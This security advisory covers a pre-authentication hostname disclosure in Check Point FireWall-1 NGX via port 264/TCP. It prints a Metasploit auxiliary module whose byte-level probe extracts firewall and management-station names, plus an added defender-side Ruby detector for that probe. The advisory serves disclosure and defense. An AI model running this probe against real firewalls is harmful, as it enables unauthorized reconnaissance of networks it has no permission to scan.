Information Disclosure Vulnerability in Multiple Check Point Firewall Products

Published: 2012-03-12
Updated: 2012-03-14

Affected systems:
Check Point Software FireWall-1 NGX R71
Check Point Software FireWall-1 NGX R65
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52430

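Check Point Software Technologies Ltd. was founded in 1993, with its US headquarters in Redwood City, California. It is a world-leading provider of Internet security solutions and holds a leading position in the global enterprise firewall, personal firewall and virtual private network (VPN) markets.

Multiple Check Point endpoint security products contain an information disclosure vulnerability in their implementation: sending certain queries to port 264/TCP on a CheckPoint Firewall-1 causes the hostname to be revealed. An attacker can exploit this vulnerability to obtain sensitive information.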


<*Source: Patrick Webster (pwebster@ausgeo.com.au)
  *>

Test method:
--------------------------------------------------------------------------------

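Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Patrick Webster (pwebster@ausgeo.com.au) provided the following test method: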

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
            'Description'    => %q{
                This module sends a query to the port 264/TCP on CheckPoint Firewall-1
                firewalls to obtain the firewall name and management station
                (such as SmartCenter) name via a pre-authentication topology request.
                Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it
                does discus the same protocol and is somewhat related to this information
                disclosure.
            },
            'Author'         => [ 'patrick' ],
            'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
            'References'     =>
                [
                    # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
                    [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder
                    [ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish
                ]
        ))

        register_options(
            [
                Opt::RPORT(264),
            ], self.class)
    end

    def autofilter
        false
    end

    def run
        print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
        fw_hostname = nil
        sc_hostname = nil

        connect

        # Initial hello: 8 bytes, sent as two 4-byte writes.
        sock.put("\x51\x00\x00\x00")
        sock.put("\x00\x00\x00\x21")
        # The service is treated as CheckPoint only if it answers "Y\x00\x00\x00".
        res = sock.get_once(4)
        if (res == "Y\x00\x00\x00")
            print_good("Appears to be a CheckPoint Firewall...")
            # Pre-authentication topology request: "securemote\0" preceded by 0x0000000b.
            sock.put("\x00\x00\x00\x0bsecuremote\x00")
            res = sock.get_once
            # The reply carries the names as CN=<firewall>,O=<management station>.
            if (res =~ /CN=(.+),O=(.+)\./i)
                fw_hostname = $1
                sc_hostname = $2
                print_good("Firewall Host: #{fw_hostname}")
                print_good("SmartCenter Host: #{sc_hostname}")
            end
        else
            print_error("Unexpected response: '#{res.inspect}'")
        end

        report_info(fw_hostname,sc_hostname)

        disconnect
    end

    # The listing reproduced here stops at this point; the definition of
    # report_info, which run calls above, is not included in it.
end
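
An added example, not part of the original advisory or of the Metasploit module: a defender-side check in Ruby that recognises the topology request shown above in reassembled client payloads sent to 264/TCP, flags sources outside an expected range, and reports which names a captured reply exposes. The function names, the sample sessions and reply, the allowed range and the reading of 0x0000000b as a length prefix are assumptions.

```ruby
require "ipaddr"

# Added example; byte values are those the module above sends and matches.
HELLO = "\x51\x00\x00\x00\x00\x00\x00\x21".b # the two 4-byte writes as one stream
QUERY = "securemote\x00".b

# Classify reassembled client-to-server bytes seen on 264/TCP.
# Returns :topology_query, :hello_only or :other.
def classify_client_stream(data)
  data = data.b
  return :other unless data.start_with?(HELLO)
  rest = data.byteslice(HELLO.bytesize, data.bytesize)
  return :hello_only if rest.bytesize < 4
  # Assumption: the 4 bytes before the string are a big-endian length
  # (0x0000000b == 11 == "securemote\0".bytesize).
  len = rest.unpack1("N")
  rest.byteslice(4, len) == QUERY ? :topology_query : :hello_only
end

# Names exposed in a captured server reply (same pattern as the module), or nil.
def leaked_names(reply)
  m = reply.b.match(/CN=(.+),O=(.+)\./i)
  m && { firewall: m[1], management: m[2] }
end

# Sessions that sent the query from outside the ranges expected to reach 264/TCP.
def unexpected_queries(sessions, allowed_cidrs)
  nets = allowed_cidrs.map { |c| IPAddr.new(c) }
  sessions.select do |s|
    classify_client_stream(s[:client_bytes]) == :topology_query &&
      nets.none? { |n| n.include?(IPAddr.new(s[:src])) }
  end
end

# Constructed sample data (documentation address ranges), not real traffic.
PROBE = HELLO + "\x00\x00\x00\x0b".b + QUERY
SAMPLE_SESSIONS = [
  { src: "192.0.2.10",   client_bytes: PROBE },
  { src: "198.51.100.7", client_bytes: PROBE },
  { src: "198.51.100.8", client_bytes: "GET / HTTP/1.0\r\n\r\n".b },
].freeze
SAMPLE_REPLY = "CN=fw01,O=mgmt01.example.x7y8z9\x00".b

if __FILE__ == $PROGRAM_NAME
  unexpected_queries(SAMPLE_SESSIONS, ["192.0.2.0/24"]).each do |s|
    puts "ALERT topology query to 264/TCP from #{s[:src]}"
  end
  p leaked_names(SAMPLE_REPLY)
end
```
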
